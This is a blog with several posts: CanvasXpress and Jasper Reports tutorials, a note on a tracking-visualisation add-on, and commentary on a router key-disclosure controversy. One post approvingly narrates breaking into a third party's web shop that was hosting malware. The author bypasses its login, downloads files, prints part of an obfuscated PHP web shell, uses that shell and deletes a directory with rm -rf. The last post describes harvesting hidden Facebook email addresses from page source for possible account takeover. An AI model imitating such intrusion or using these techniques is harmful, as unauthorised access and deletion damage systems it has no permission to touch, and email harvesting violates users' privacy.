Need of Security

CanvasXpress - Powerful graphing tool

2012-12-06T22:01:00.001-03:00

About this article

I’ve been using CanvasXpress for real time graphing for a corporative website.
As a team, we learned a lot about this library and how browsers interact with the canvas element, so this article is about sharing our gained experience and introducing the mostly unknown canvasXpress library.

I’ll looking forward to read your thoughts about any of this topics; other libraries, other technologies (like SVG) and of course you’re welcome to mail me any doubt you have and I’ll try to help.

About the author
I’m currently working for a multinational electric company. My focus is on RESTful web services, Spring MVC and HTML5.

Index

1 - Introduction to the Canvas element
2 - Examples of the Canvas element
3 - Canvas vs SVG
4 - CanvasXpress library
5 - Browser support
6 - Basic usage
7 - Real world scenario
8 - End

Introduction to the Canvas element

HTML5 brought to the web development world a huge amount of useful features. One of those features is the Canvas element.
The Canvas element allows dynamic content and scriptable rendering of 2D shapes and bitmap images. It is a low level, procedural model, that updates a bitmap and does not have a built in scene-graph.
We can say that Canvas is a drawable region in HTML code with a height and width attributes. Javascript code may access this region, allowing us to generate fully dynamic content as graphics, games, animations and so on.

A Canvas element within a page would look like this:

<canvas id="example" width="200" height="200"> 
This text is displayed if your browser does not support HTML5 Canvas.  
</canvas> 

And this is how you may access it from Javascript:

var example = document.getElementById('example');  
var context = example.getContext('2d'); 
 context.fillStyle = 'red'; 
 context.fillRect(30, 30, 50, 50); 

You could try this simple example and play a little bit with the element. You will find that is very easy to use and very powerful.
Although using the Canvas element is easy for simple animations, is not the best choice to access the element directly if you want to create complex animations.
As with many technologies, sometimes you may have to use libraries that abstract functionalities in order to create reusable, easy to maintain and less error-prone applications.

We should imagine the Canvas element as a big board where we can draw anything we want. If we use only a pen, we might achieve a good draw, but if we want to create an amazing draw, we need some extra tools.

In the development world is a common rule to “not reinvent the wheel” and to “use anything you can” so if you need to create a game or a graph, first you should search for available libraries and toolkits. If you find anything that suits your needs, then you can worry about licenses and costs, but first you have to look out there. This might not sound important at first, but it can speed up your development in a very noticeable way.
In this article we’re going to do a real-time data graph, and that’s where CanvasXpress comes in.

Examples of the Canvas element

First of all, it's important to know what is the Canvas element capable of, so I gathered a few examples applications that goes from games and animations to graphics. This examples aren’t related to any library in particular, it’s just to demonstrate the power of this feature and what we could use it for.Applications

mugtug.com/sketchpad/

http://www.canvasdemos.com/2009/10/17/dynamic-image-collage/

http://www.canvasdemos.com/2010/03/23/k3d-canvas-3d/Animations

http://www.canvasdemos.com/2009/10/09/html-5-canvas-animation/

http://www.queness.com/post/3885/8-simply-amazing-html5-canvas-and-javascript-animationsGraphics

http://www.canvasdemos.com/2010/12/17/wikipedia-knowledge-map/

http://www.canvasdemos.com/2010/11/03/diagramo/

I recommend to try this applications in order to get a feel about what the Canvas element is capable of. As you can see, there’s a lot to do with it.

Canvas vs SVGScalable Vector Graphics (SVG) is a family of specifications of an XML-based file format for two-dimensional vector graphics, both static and dynamic (i.e., interactive or animated). The SVG specification is an open standard that has been under development by the World Wide Web Consortium (W3C) since 1999.

Is common to see graphics made with SVG, for instance we can talk about Google Chart Tools, a powerful API which uses this technology to create graphics.
Although Canvas and SVG are very different technologies, it’s a common error to think they’re alike.
These are the main differences between them directly from w3s.

SVG

SVG is a language for describing 2D graphics in XML.
SVG is XML based, which means that every element is available within the SVG DOM. You can attach JavaScript event handlers for an element.
In SVG, each drawn shape is remembered as an object. If attributes of an SVG object are changed, the browser can automatically re-render the shape.

Canvas

Canvas draws 2D graphics, on the fly (with a JavaScript).
Canvas is rendered pixel by pixel.
In canvas, once the graphic is drawn, it is forgotten by the browser. If its position should be changed, the entire scene needs to be redrawn, including any objects that might have been covered by the graphic.

Comparison of Canvas and SVG

The table below shows some important differences between canvas and SVG.

Canvas	SVG
Resolution dependent No support for event handlers Poor text rendering capabilities You can save the resulting image as .png or .jpg Best suited for graphic-intensive games where many objects are redrawn frequently	Resolution independent Support for event handlers Best suited for applications with large rendering areas (Google Maps) Slow rendering if complex (anything that uses the DOM a lot will be slow) Not suited for game applications

CanvasXpress library

CanvasXpress was created to have a generic way to display genomics data and it’s the core of a BMS systems biology platform.
As you may think, this library was created to display an specific type of data, but luckily for us, it can be used to display any type of data in an efficient, cross-browser way.

CanvasXpress supports bar graphs, line graphs, bar-line combination graphs, boxplots, dotplots, area graphs, area-line combination graphs, stacked graphs, stacked-line combination graphs, percentage-stacked graphs, percentage-stacked-line combination graphs, heatmaps, heatmaps, 2D-scatter plots, 2D-scatter bubble plots, 3D-scatter plots, pie charts, correlation plots, Venn diagrams, networks (or pathways), candlesticks plots,genome browser and circular plots. It also supports a few data transformations like log and exponential transformation, z-score, percentile transformation, ratios and transposing. It also support grouping of samples, hierarchical clustering, kmeans, complex layouts, regression lines, normal distribution plots, non linear fitting, zooming, events
There’s a lot to choose and many customization options like description position, font size, colors, resize, and more!

You can check more about in its official website: http://www.canvasxpress.org

Browser support

The compatibility is first determined by the canvas element support. At the time of writing, most browsers supports this element with the exception that older versions of IE requires an additional library called ExplorerCanvas.

Canvas compatibility chart from caniuse.com/canvas
At the time of writing, the official website says that CanvasXpress is supported by all major browsers as well, but I’ve only tested with Firefox and Chrome (latests versions) with excellents results.

Basic usage

Creating a graphic is very simple, we only need to instantiate with a few arguments that I’ll explain below:

var cX = new CanvasXpress(target, data, config, events); 

target

The parameter target is the id of the element in the DOM with the tag name <canvas>. If it is undefined, a new element is inserted in the document body.
data
A json object with the data you want to plot. There are six different data formats. One for the genome browser, one for the networks, one for the Venn diagramas, one for the correlation plots, one for the stock market data and one for all the other graphs.

The data structure you probably be using for simple graphics is the last one, that looks like this:

{
"y": {
    "vars": [
     "Today"
    ],
    "smps": [
     "0h",
     "6h",
     "12h",
     "18h"
    ],
    "desc": [
     "Description"
    ],
    "data": [
     [
       2000,
       1023,
       660,
       1030
     ]
    ]
}
};

The others structures are well explained in the official website.config

Pretty much everything in this library is customizable. The configuration parameters are divided in sections and they’re well documented in the official website.
We’ll see a few of them in the examples but it is highly recommended to check all of them so you can know what you can customize and what you cannot.

events

The parameter events is a json object with the user defined events. By default four events that canvasXpress supports are assigned which are mouseover, mouseout, click and dblclick. The events can also handle scope as shown below. In json format the events is like this:

{mouseover: function(o) { // Do something ... }, 
 mouseoutr: function(o) { // Do something more... }, 
 click: function(o) { // Do something else ... }, 
 dblclick: function(o) { // Do even more stuff } } 
 or  
{scope: myScope, handler: {mouseover: function(o) { 
 // Do something ... 
 }, click: function(o) { 
 // Do something else ...  
}  
} 
} 

Real world scenario

Intro
Download examples

In one of our applications, we had to create a graphic in HTML5 with data received from a RESTful web service. In our case, we also created the RESTful web service, so it was easy to us to just return a valid canvasXpress structure as a JSON response.

I’m not going to enter into the details of the web service since I want to keep the article topic-specific, but I want to point out that we had 2 options for the web service.

1) Return only JSON with the data and create the structure for canvasxpress in the client (javascript)
2) Return JSON with the data within a valid canvasxpress structure.

I ended up creating both implementations, because we didn’t have at the time further details about mobile developments that would access the web service.
But for our first requirement, we used the second option, as it was easier and less error prone for us to create the valid structure in the backend.

The code
I’ve attached three examples, one with the graphic creation and two others with data update and add.

Let’s see the important parts of the code.

This function creates the graphic. data is the JSON data and config is the JSON that has the config of the graphic.

function drawGraph(data, config) {
//Create the new canvas graphic.
new CanvasXpress("graph", data, config);
}
By calling this method with a valid data and a valid config, with created this graphic:

In order to update the graphic, first you must find the reference and then you pass to the update method the new JSON structure:

function updateGraph(data) { //get all canvasXpress references.     
 for (var i = 0; i < CanvasXpress.references.length; i++) {           
//If the reference match our target           
     if (CanvasXpress.references[i].target == 'graph') {              
        //update the graph               
          var c = CanvasXpress.references[i];                    
          c.updateData(data); c.draw();                 
          }              
        }  
   } 

If we press the update button, we ended up with an updated graphic:
If you notes some delay in the examples, keep in mind that I’m using the complete event of JQuery Ajax just to show you an example a little bit more realistic, but if you want, just call the draw methods without the ajax call.

Of course we have differents types of charts. In this case we are using the type “Line” but we could also choose another like the type “Bar”:
Besides creating and updating, we can also add data to the current chart. Check this code:

function addMoreDataGraph(variable, values) {         
         //get all canvasXpress references.         
          for (var i = 0; i < CanvasXpress.references.length; i++) {         
              //If the reference match our target             
              if (CanvasXpress.references[i].target == 'graph') {                
                  //update the graph                
                  var c = CanvasXpress.references[i];                
                  c.data.y.vars.push(variable);                 
                  c.data.y.data.push(values);                 
                  c.updateData(c.data);                
                  c.draw();           
                } 
             } 

If you press the addData button in the example, you should see something like this:
End

The canvas element allows endless possibilities, not only with graphics, but with animations, games and so on. HTML5 is here to stay and nothing stops us to take fully advantage of its features.

There’s a lot to do with this library, you can achieve good results and create really dynamic graphics for all major browsers.
This library allows to customize almost everything in the chart and it has a lot of built-in action events that
you could use.

I hope the examples are clear enough.
If you have any doubt, recommendation or critics, feel free to contact me or post a comment!

Jasper Reports: Generación de documentos

2012-11-04T17:30:00.000-03:00

Jasper Reports: Generación de documentos

Jasper Reports es una librería acompañada por un conjunto de herramientas que facilitan la generación de documentos mediante código.
Voy a explicar los conceptos básicos de Jasper y realizar u ejemplo

1) Empezando con Jasper: Requerimientos y herramientas.

Se requieren varias librerías para utilizar Jasper. Las dejare en un zip para el que quiera probar pero en reglas generales si lo que se desea es generar un PDF las librerías son estas:

Jakarta Commons BeanUtils Component (versión 1.8.0 en adelante) http://jakarta.apache.org/commons/beanutils/
Jakarta Commons Collections Component (versión 2.1.1 en adelante) http://jakarta.apache.org/commons/collections/
Jakarta Commons Javaflow (Sandbox version) http://jakarta.apache.org/commons/sandbox/javaflow/
Jakarta Commons Logging Component (versión 1.0.4 en adelante) http://jakarta.apache.org/commons/logging/
Jakarta Commons Digester Component (versión 1.7 en adelante) http://jakarta.apache.org/commons/digester/
iText - Free Java-PDF library by Bruno Lowagie and Paulo Soares (versión 2.1.7 en adelante) http://www.lowagie.com/iText/

Y obviamente la libreria respectiva de Jasper que la pueden encontrar en este link.

Con esto tenemos todo para generar un reporte, pero hay otra herramienta mas que facilita la creación del diseño del documento: iReport.

Luego de instalar correctamente iReport y tener todas las librerias en nuestro proyecto de prueba, ya podemos comenzar con el diseño del documento, pero antes hay que entender algunos conceptos.

2) fields, parameters y variables.

Hay varios elementos a utilizar con iReport, como por ejemplo: title, page footer, etc. Pero quiero hacer énfasis en estos 3 porque son los que más confusiones producen.Fields : Son campos en una tabla, es decir si realizas una consulta SQL, puedes utilizar lo que la consulta devuelva para popular valores en el reporte. Se referencian con F${nombreCampo}.Parameters: Son objetos que pueden popularse mediante código. Se referencian con P${nombreParametro}.Variables: Son expresiones que son inherentes al reporte. Por ejemplo si necesitas tener la fecha en el que se genero el reporte a pie de página lo ideal sería usar una variable. Se referencian con V${nombreVariable}.

Entendiendo esto, se hace más fácil utilizar iReport ya sabiendo que elementos necesitas colocar en pantalla. Por ejemplo, si no realizas ninguna query y tenes el datasource vacio en la configuración del reporte pero de igual manera utilizas un field para mostrar en pantalla el valor deseado, nunca se asignara el valor cuando lo popules mediante código.

3) Diseñando el reporte.

Abrimos el iReport y clickeamos en Archivo->new. Seleccionamos iReport y el diseño blank A4.
Abrimos el iReport wizard y clickeamos siguiente ya que en este caso no utilizaremos consultas a una base de datos.

El iReport deberia estar de esta manera (o similar, dependiendo la version utilizada):
Ahora procedemos a crear algunos textos estaticos, por ejemplo “Nombre”, “Edad”, etc.
Para esto necesitamos visualizar la Paleta, asi que primero vamos a Ventana->Paleta o presionamos ctrl + shift + 8.

Con la paleta activa, arrastramos algunos elementos “static text” al reporte y les ponemos el nombre que queramos, quedaria algo asi:

A estos elementos podemos darle el formato que queramos y ponerle el texto que queramos. Cuando los elementos son del mismo tipo, pueden seleccionarse todos y modificar sus propiedades en la pestaña de propiedades a la derecha.
Luego de de modificarle el nombre a cada elemento, también decidí asignarle la propiedad “underline” además de modificar un poco el tamaño:

Ahora bien, esto es solo texto estático. Ahora necesitamos asignar los parámetros que van a recibir los valores, es decir, el combustible, la cantidad, y el responsable, para que el reporte pueda ser dinámico y generarse mediante código. En este caso utilizaremos los parameters.
Hacemos click derecho en parameters y agregamos los 3 parámetros que vamos a utilizar, luego los arrastramos a la posición deseada en nuestro reporte:
Cada elemento tiene infinidad de propiedades y en el caso de los elementos dinámicos –como los parameters- también permiten expresiones (del tipo, if x then y).

Por ahora dejaremos esto así y pasaremos al código, pero antes, click derecho a la izquierda en el elemento principal del árbol, es decir el que tiene el nombre del reporte, propiedades y modificar language a Java.

Ahora sí, algo de código:

4) Compilando el reporte y populando parámetros:

El código habla por sí solo más aun cuando esta comentado:
final String RUTA_JRXML
= "C:/Users/matias.j.de.marco/Desktop/JasperTutorial/Report1.jrxml";
final String RUTA_JASPER
= "C:/Users/matias.j.de.marco/Desktop/JasperTutorial/Report1.jasper";

try {
//Se compila el jrxml que genera el iReport.
//Esto genera un archivo .jasper.
JasperCompileManager.compileReportToFile(RUTA_JRXML);
} catch (JRException e) {
//Atrapa la excepción y manejala correctamente.
}

//Ahora creamos un hashmap que tendra los valores a
//llenar en el reporte
//nombreEniReport, valor
Map pars = new HashMap();

pars.put("combustible", "Gas natural");
pars.put("cantidad", "1000");
pars.put("responsable", "Matias De Marco");

JasperPrint jasperPrint = null;
try {
//Se llena el reporte.
jasperPrint = JasperFillManager.fillReport(
RUTA_JASPER, pars,
new JREmptyDataSource());
} catch (JRException e) {
//Atrapa la excepción y manejala correctamente.
}

//Se exporta a PDF
try {
JasperExportManager.exportReportToPdfFile(jasperPrint,
"reporte.pdf");
} catch (JRException e) {
//Atrapa la excepción y manejala correctamente.
}
Como verán, a modo de ejemplo están todas las rutas hardcodeadas, pero las rutas en una aplicación real se obtienen en forma dinámica como recurso (a partir de una ruta relativa o alguna ruta definida ya sea en Struts o en WebSphere).
Los valores a popular, obviamente se pueden obtener de algún objeto que provenga ya sea de un servicio o directamente de algún form, o de cualquier otro objeto que contenga datos.
Ejemplo del PDF:

5) Posibles problemas.

Obviamente los diseños de los reportes no son así de sencillos en una petición real ni los valores se obtienen tan fácilmente.
Hay problemas que suelen suceder a menudo cuando se utiliza Jasper por primera vez, por ejemplo:

ClassCastException.
En el iReport cada elemento tiene su tipo, que aunque por defecto es siempre String, puede modificarse para que sea Double, Integer, y demás tipos de datos.

Si vemos en la asignación del parámetro cantidad, está siendo pasado como una cadena pero si recibiésemos un Double en lugar de un String tenemos dos opciones:

1) Parsear el valor del Double a String.
2) Modificar el tipo de dato en iReport a Double.

Ambas son opciones son validas y sencillas. Las propiedades del tipo de dato pueden modificarse en la pestaña propiedades a la derecha en el iReport.

Valores nulos.

Cuando no se popula un parámetro, los valores se asignan en null automáticamente. Por ejemplo si no asignamos nada al parámetro “responsable” este aparecería en null en el PDF generado.

Hay dos soluciones para esto.

1) Usando expressions. Click derecho en cada campo y presionar en “Edit Expression”. Luego hacer algo como esto:

($P{responsable } == null ? "" : $P{responsable})

2) La otra forma es seleccionando todos los campos y en propiedades setear “Blank when null”. Muchísimo más sencillo que la primer solución.

6) JRXML.

A esta altura vale aclarar que clickeando en la pestaña XML del iReport podemos visualizar el XML puro de todo lo que estuvimos diseñando con iReport.
Sabiendo esto, se pueden agregar elementos, propiedades, formato, expresiones, y muchas cosas más simplemente codificando en XML.

Puede ser engorroso por ejemplo, mover elementos de posición tocando directamente el XML, ya que con el iReport solo se seleccionan y se mueven los elementos donde gustes, pero codificar directo en el XML puede ser muy útil para agregar reglas de formato y tags HTML.

7) Formato HTML.

A veces se requieren formatos que son difíciles de realizar en Java solamente con el manejo de Strings. Por ejemplo expresar 102 en un simple String Java no es fácil sobre todo si el encoding utilizado no soporta este tipo de símbolos.
Para esta tarea, iReport soporta diversos tags html que pueden servir para dar el formato que queramos. Para ello, primero hay que habilitar la propiedad “markup”a los elementos.
Seleccionamos los elementos que queramos y en propiedades vamos a “markup” y seleccionamos “styled”.

Ahora volvamos al código y modifiquemos los valores en el HashMap de esta manera:

pars.put("combustible", "Gas natural");
pars.put("cantidad", "1000<sup>3</sup>");
pars.put("responsable", "Matias De Marco");

El tag “<sup>” en este caso se refiere a superscript, y veremos que ahora el resultado en el PDF es este:

8) Libros recomendados:

JasperReports 3.5 for Java Developers, by David Heffelfinger
JasperReports 3.6 Development Cookbook, by Bilal Siddiqui

Collusion: Observa quienes te rastrean!

2012-02-29T21:23:00.000-03:00

Es muy comun que los sitios rastreen mediante cookies cuales son tus gustos personales en pos de poder "ofrecerte" anuncios acordes.
Este es uno de los negocios mas rentables que existe en la actualidad y es uno de los pilares de las grandes compañias.

Gary Kovacs, el CEO de Mozilla, presento durante TED 2012 un addon para Firefox que permite ver en tiempo real que sitios estan siguiendo tu actividad mientras navegas.

Collusion crea una matriz de puntos grises que marcan los sitios que has visitado o estás visitandos. Estos puntos se conectan a otros puntos de color rojo que son los sitios que te estan rastreando mediante cookies.

La idea que plantea Kovacs es lanzar Collusion a gran escala en pos de poder tener una vision mas detallada de cuales son los sitios que rastrean nuestra información, como, y por que. El saber esto nos podria permtir en un futuro resguardar nuestra privacidad y nuestra actividad en la red.

Kovacs dijo:

“Estamos siendo observados. Es el momento de observar a los observadores”.

Se puede descargar Collusion en el sitio de Mozilla.

Fallo de seguridad en el router COMTREND. Una de suspenso.

2011-02-06T20:19:00.004-03:00

Ya habíamos hablado de este fallo en otra oportunidad. De como SeguridadWireless al descubrir el fallo decidió no revelar los detalles técnicos por el momento en pos de darle tiempo a las compañías para que puedan solucionarlo.

Lo que mas me ha asombrado en este ultimo tiempo es la cantidad de noticias sin contrastar (en parte gracias al silencio de los implicados) que he visto en varios blogs de seguridad.. Todo comenzó con unaaldia de Hispasec:

Todo apunta a que el algoritmo ha sido filtrado por alguien con acceso a
esta información desde alguna de las empresas implicadas. La otra opción
sería el haber realizado ingeniería inversa a una gran muestra de
routers, y esto pensamos que es extremadamente complejo (aunque no
imposible) por el hecho de que el algoritmo usa hashes criptográficos.

Primero que nada hay que aclarar que no es necesario emplear ingeniería inversa a una gran muestra de routers, basta con hacerlo en uno solo. Al obtener el algoritmo, lo único que necesitas es conseguir otra persona de confianza (o varias) con el mismo modelo y pedirle sus datos (BSSID y ESSID) y luego verificar si la clave generada por el algoritmo descubierto corresponde con la real.

Otro articulo que leí fue el de S21sec, el cual proclama:

De todas formas, es improbable que el algoritmo se haya descubierto mediante criptoanálisis, y todo apunta a que haya habido
alguna fuga de información, puesto que es imposible poder revertir un algoritmo de hash como MD5 (aunque sí que existen ataques publicados pero con el objetivo de conseguir colisiones, no de recuperar el texto): cogemos un entrada de longitud aleatoria que después de pasar por el algoritmo MD5 nos devuelve siempre 128 bits; realmente es como si cogemos cualquier número, lo dividimos entre 2, pero sólo nos quedamos con el resto (que será 0 ó 1): es imposible recuperar el número original a partir de ese 0 ó 1.

Realmente me parece sorprendente que en ningún momento se mencione la posibilidad de que hayan empleado ingeniería inversa.

Como ya se sabe, los primeros en descubrir el fallo fueron los de SeguridadWireless. El segundo en descubrir el fallo fue elvecino. A pesar de no haber relación entre los dos sitios que descubrieron el fallo, ambos tomaron una politica similar de no liberarlo completamente. En el caso de SeguridadWireless para darle tiempo a las compañias para que resuelvan el fallo y mantener la seguridad de las redes lo mas posible, y en el caso de elvecino por algo bastante similar, porque se notaba demasiado que la mayoría de las personas que querían conocer los detalles técnicos del fallo, era simplemente para tener conexión gratis.

Elvecino a pesar que no hizo publico el fallo directamente, fue dando pistas en el foro de LampiWeb donde varios se estaban quemando las pestañas intentando adivinar como se generaba la clave probando combinaciones aleatorias y convirtiendo estas a MD5 (intentos inútiles por supuesto dada las características técnicas del algoritmo MD5)
En el foro de Lampiweb, elvecino decidió ir dando pistas para ayudar a las personas que realmente querían investigar el tema. Se especifica como emplearon ingeniería inversa al firmware del router dando detalles a medias, pero que le bastan a cualquier persona con los conocimientos suficientes para poder reproducir el mismo proceso.

¿A que voy con esto? que me parece hilarante que se este hablando de fugas y chivatos cuando la realidad es mucho mas simple. Ingeniería inversa, y no mas que eso.
Mi recomendación es que contacten con los responsables implicados en el tema para obtener información fehaciente y dejar de lado la especulación.

Ojala los blogs de seguridad rectifiquen pronto.

Update

Comunicado oficial de SeguridadWireless.net

Nuevo comunicado 4-2-2011
Como todos sabéis, ayer se libero el algoritmo de generación de claves wifi usado por los routers comtrend que instala tanto Movistar como Jazztel.
También sabéis que el equipo de seguridad wireless descubrió ese algoritmo el día “*”. Desde entonces seguridadwireless.net ha sido objeto de insultos y descalificaciones por el simple hecho de no publicar el algoritmo, el motivo de este comunicado es explicar (de nuevo) las posturas de seguridadwireless y defendernos de ciertas acusaciones.

En primer lugar se debe conocer la siguiente premisa: seguridadwireless.net es un foro dedicado a investigar la seguridad en redes inalámbricas. NO es un foro de wifi gratis. Cualquiera que haya entrado se habrá dado cuenta que esta totalmente prohibido cualquier referencia a auditar redes wifi ajenas y preguntas de este tipo han sido y serán consecuencia de baneo inmediato en el foro.

Debido a la temática y recursos del foro hay quien ha cometido el error de pensar que en realidad, se trata de un sitio donde te ayudan a piratear el wifi al vecino (pero que no lo dicen abiertamente para no ver envueltos en líos legales) por lo que luego vienen las sorpresas:

Seguridadwireless no publica un algoritmo que deja cientos o quizás miles de usuarios indefensos, una herramienta “magica” que con solo poner los datos de la red de tu vecino te da conexión gratis y te mete de lleno en un delito telemático.

Así como otras comunidades han liberado generadores de diccionarios sin liberar fuentes Seguridad wireless se siente orgullosa de afirmar que siempre ha liberado el código fuente de todos los generadores y explicado la forma en que se descubrieron llevando esto (en ocasiones) a la copia por otras comunidades de herramientas (incluso sin citar fuentes).

En seguridad wireless se han recopilado y creado herramientas de seguridad como los LiveCd wifiway o wifislax que facilitan la auditoria wireless.

Entonces ¿Por que entonces en esta ocasión no se ha liberado el fuente?
nos encontramos ante un problema de seguridad gordo, de libro. la posibilidad de conocer la clave por defecto de un router con tan solo conocer la MAC del router y su nombre, nada de airodump,aircrack, captura de paquetes, datas ivs ni ataques de fragmentación. Nos encontramos ante la posibilidad de que cualquier persona independientemente de sus conocimientos de seguridad e intenciones ponga en jaque, con papel y lápiz la seguridad de las redes que le rodean. Redes que se están implantando masivamente en España en este momento.

No se libera el algoritmo, se establece una política de disclosure y se considera que no se debe liberar un (llamémoslo exploit) “0day”, se decide contactar a la empresa y se pacta un Non-disclosure agreement o NDA durante un tiempo determinado. para permitir a la empresa solucionar el problema.

Y aquí señores es donde se diferencia un foro de pirateo wifi de un grupo de seguridad, llegados a este punto se antepone la seguridad de los usuarios a otros asuntos mas triviales como el dudoso merito de publicar un algoritmo capaz de permitirle a cualquiera el acceso a redes que no le pertenecen por el simple hecho de bajarse una aplicación para su móvil.

Habría que ver cuantas de las personas que han insultado (porque en su mayoría eran directamente insultos y no criticas) a seguridadwireless por este motivo les haría gracia ver como sus peticiones dns, sus comunicaciones ssh son hackeadas porque a alguien se le ocurrió que era buena idea liberar el mal antes que la cura.

O ¿como te sentirías si te robasen el coche porque a un gracioso se le ocurrió decirle al mundo entero como crear una llave maestra que abriese tu modelo de coche sin dar tiempo a que tu marca te pusiese una solución? hay que ser civilizados.

Por ultimo, el equipo se seguridadwireless se siente profundamente triste, una comunidad que ha demostrado ser libre, trabajando con software libre e idas libres con la única premisa de no hacer daño y ayudar pidió un voto de confianza en un momento dado.
Por parte de algunas personas no se le dio. Desconocemos si estas personas pensaban que la web se trataba de “wifigratis” y pensaban que tenían derecho a recibir sin mas, el algoritmo. si es el caso les rogamos que se dirijan a los foros dedicados a tales fines donde podrán encontrar ejecutables que les saquen las redes pero no los fuentes.
Si por lo contrario te interesa la seguridad inalámbrica y no estabas de acuerdo con ciertas decisiones esperamos que haya quedado todo explicado y reconocemos que en algunos momentos se pudo dar mas información de la que se dio sobre lo que estaba ocurriendo.

Haciendo la buena obra del día

2011-01-28T06:21:00.010-03:00

En el día anterior un usuario posteo en el hacker.net una duda respecto de un ejecutable que se transmitía mediante Facebook. La pregunta era si el link que contenía el mensaje era o no era un virus.

El mensaje en especifico era este:

"hahaha foto
http://apps.facebook.com/photoyeahhh/photo.php?=100000504053506 "

Al entrar a la aplicación nos encontrábamos con una pagina similar a Facebook que contenía un mensaje que declaraba:

Si quieres ver la foto haz click aquí!

Esta aplicación nos dirigía automáticamente a http://foxy-golf.com/img/facebook-pic000934519.exe donde aparecía la confirmación de si queríamos o no descargar el archivo.
Obviamente, lo descargamos y le damos un análisis en VirusTotal para confirmar que efectivamente se trata de malware (si es que hacia falta confirmación) específicamente un bot controlado mediante IRC.

facebook-pic000934519.exe

Submission date:
2011-01-27 23:08:19 (UTC)
Current status:
finished
Result:
3 /43 (7.0%)

Comodo: P2PWorm.Win32.Palevo.GZA
Jiangmin: Heur:Backdoor/Agent
NOD32: a variant of Win32/Injector.EMI

Hecho esto nos interesa verificar si el host es una web infectada o si es un host implementado en pos de alojar los archivos maliciosos. Entramos en http://foxy-golf.com y al parecer nos encontramos con una tienda:

Registrant:
foxy golf
40 w turkeyfoot lake rd.
akron, Ohio 44319
United States

Domain Name: FOXY-GOLF.COM
Created on: 13-May-08
Expires on: 13-May-12
Last Updated on: 14-May-10

Rápidamente nos damos cuenta que es un sistema osCommerce, y lamentablemente en este caso una versión muy vulnerable y sin ningún tipo de parche aplicado por parte del administrador.

Accedemos fácilmente al listado de archivos bypasseando el login, y comprobamos rápidamente que se pueden descargar archivos a diestra y siniestra. Obviare algunas partes por razones que se caen de maduras, pero seria algo similar a:

xxxxxx/xxx.php?action=download&file=path

Tenemos el listado de archivos y sabemos que podemos descargar. Se podra subir archivos? seguramente, pero primero veremos si podemos descargar algún fichero con los passwords necesarios.

Luego de probar la descarga de varios archivos sin suerte, a simple vista la opción mas factible es intentar subir una shell. No obstante, si el host esta infectado posiblemente tenga una shell en alguno de sus directorios, y si el atacante fue lo suficientemente inexperto, esta va a estar a la vista.

Descargamos los pocos archivos que nos quedaban por revisar hasta que encontramos uno con algo similar a:

GIF89;a
eval(gzinflate(base64_decode('
7P37ehq58igM/73zPLkHhWENMLE5+RAfgicYsI3j
I/gcZ/vX0A10DDRDg7Ezk/d+3+8qvqqS1K0+AXY8
s9Z69/ZaGUAqlUqlUqlUkkq/b338fdAZvH2T+e0f
+ctgTf/PP/DHa2Is2UxZuqGzxhOr96uDyvCuXlwo
Gw9G1xrw5IOn7H1H49CHxeoB64xGg41M5qHfGGpm

Al descodificar este archivo, efectivamente nos damos cuenta que es la shell que necesitabamos. Intentamos acceder a la shell desde http://foxy-golf.com/shell.php y efectivamente tenemos suerte:

Como habíamos detectado al inicio, los archivos maliciosos se encontraban en el directorio /img/, por ende lanzamos un rm -rf y eliminamos el directorio completamente. Logrando asi que la aplicación de Facebook deje de funcionar:

Terminamos el asunto dejando un archivo explicándole al administrador como debería solucionar los fallos, por supuesto también se lo enviamos por mail. Luego de esto eliminamos la shell que habíamos encontrado, saliendo así completamente del sitio.

Conclusión

El aspecto positivo es que evitamos que mas gente se siga infectando al deshabilitar la aplicación que transmitía el malware, por lo menos momentáneamente.

El aspecto negativo es que posiblemente el administrador ni siquiera solucione los fallos de su sitio web y aunque lo hiciese, siempre habrá cientos de administradores con sus sitios sin parchear y fácilmente accesibles por cualquier atacante.

Lamentablemente Comodo me jugo una mala pasada y elimino el backup que había hecho del ejecutable malicioso sin que pudiese debuggearlo y realizar la vacuna correspondiente, por lo tanto si tienes una muestra por ahí, no dudes en enviármela.

Tienen alguna "buena obra del día?" suelen hacerlas seguido o simplemente pasan del tema? sera un placer leer las historias que tengan.

Saludos!

Fallo en Facebook respecto del manejo de datos en "recordar contraseña"

2011-01-04T03:37:00.004-03:00

Decidí revisar a ver que tal funcionaba el servicio de recordar contraseñas de Facebook cuando me encontré con una sorpresa un tanto curiosa.
Desconozco si alguien presto atención a este pequeño detalle antes que yo, al ser tan simple supongo que si pero no he visto nada al respecto; quien tenga un link a mano y desee compartirlo puede hacerlo en los comentarios!
Este es un fallo simple pero que a la vez nos hace preguntar hasta que punto nuestra privacidad esta a resguardo.

Supongamos que tenemos un perfil X, en este caso elegi a una chica al azar que llamaremos Julieta. Julieta esta agregada en la lista de contactos de nuestra cuenta y a grandes rasgos tenemos acceso a casi todos los componentes de Facebook (Muros, Notas, etc). No obstante, la dirección de mail ya sea la principal u cualquier otro tipo de información de contacto, permanecen ocultas.

Julieta Gisele. Sin información de contacto

Es irrelevante en este caso cual es el criterio con el cual se oculto la información de contacto (Personas especificas, solo amigos, etc) ya que eso no nos importa demasiado puesto que para recordar la contraseña obviamente no hace falta iniciar ninguna sesión.

Teniendo el perfil, vamos a recordar la contraseña tocando en ¿Has olvidado tu contraseña?:

Recordar contraseña

Ahora bien, para identificar el perfil se puede cualquiera de las 3 opciones. La primer opción por supuesto no tiene sentido ya que parte de que ya conocemos la dirección de mail de antemano. La tercera implica que conozcamos como mínimo un contacto de la lista de la persona involucrada, lo cual no siempre es factible ya que dicha lista puede estar oculta. La segunda opción es la mas simple, puesto que el link del perfil puede obtenerse facilmente.

Al encontrarse el usuario, nos encontramos con un captcha, y luego de este, otro pedido de confirmación en caso que todavía deseemos recordar la contraseña.
Es un hecho conocido que casi la totalidad de los servicios como mínimo utilizan una dirección de mail para restablecer una contraseña, Facebook obviamente no es la excepción. Por supuesto por cuestiones de privacidad oculta la dirección:

Dirección oculta. ¿Oculta?

No precisamente oculta, si revisan el código fuente de esa misma pagina, encontraran la dirección completa:

"contactInfo":{"email":["Aquí el mail."]}.

¿Cual es el problema con este pequeño fallo?

Básicamente son tres:

1) Permite a un atacante obtener una dirección que en principio podría estar oculta intencionalmente. En este caso, la dueña del perfil del ejemplo tenia su dirección oculta incluso para los contactos de su lista, sin embargo puede obtenerse fácilmente sin siquiera iniciar una sesión. Si se salta el captcha incluso se puede automatizar la tarea para obtener direcciones en forma masiva.

2) La dirección de mail puede no estar activa, y en ese caso alguien podría registrar nuevamente dicha dirección y modificar la contraseña del perfil de Facebook de la victima.

